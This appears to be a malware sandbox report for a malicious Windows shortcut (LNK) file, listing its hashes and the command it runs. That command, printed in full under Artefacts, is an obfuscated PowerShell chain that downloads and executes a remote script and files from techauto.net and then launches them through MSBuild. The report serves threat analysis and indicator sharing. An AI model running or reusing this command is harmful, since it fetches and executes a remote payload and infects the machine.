Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
bdff32f1fefb7915e60287afedc13f93
Sha1
888afa39f289189b7e45c841ab526590bafce1f4
Sha256
e907b4c0fc4a8bf2c3273332dedcc1d04c2dfc6d24d76af72f264492eb7e9a00
Sha384
34dcb436ed8fce7c411fc112a125b6678e849f30c574f4d2a924d23042449193ea45b88c8490edd1a909f51c96ec4079
Sha512
afbc5074eae413256323b754a3146f56c70081e5a93f907390193638e5a4fa4ae94427e4a1038519e4c01bfae068c3f9de93a2ac5f9a3fdf37d02ccca922995b
SSDeep
24:9yfXpsD4g8J+8UeYSusKU7UT2IDmB23S9hkue8E/4KHh77N8Pu6mufVNgcZ4yxmF:9AXxg8J+8U5S6TlSUueF/lh7Z8G6mutG
TLSH
D32195760469C6C6FD45137678129B598A2CEE453BB7367B29A853CEEA242B0C883468
Artefacts
Name
Value
LNK: Command Execution

powershell.exe -comman IEX ( invoke-webrequest -useb 'https://techauto.net/js/bKyFK8Nbhy9K.ps1'); & ('c'+'u'+'r'+'l.e'+'xe') -Ls -o 3HWVau19qnE.xml 'https://techauto.net/js/opsonifiedZWG.php?q=BviyN5kMzI1t'; & ('cu'+'rl'+'.e'+'xe') -L -s -o BviyN5kMzI1t.js https://techauto.net/js/apaesthetizeOFcfB.php; & ('C:\Windows\Micro'+'soft.NET\Frame'+'work64\v4.0.30'+'319\MSBuild.e'+'xe') -nologo -noconlog C:\ProgramData\3HWVau19qnE.xml

bdff32f1fefb7915e60287afedc13f93 (1.26 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙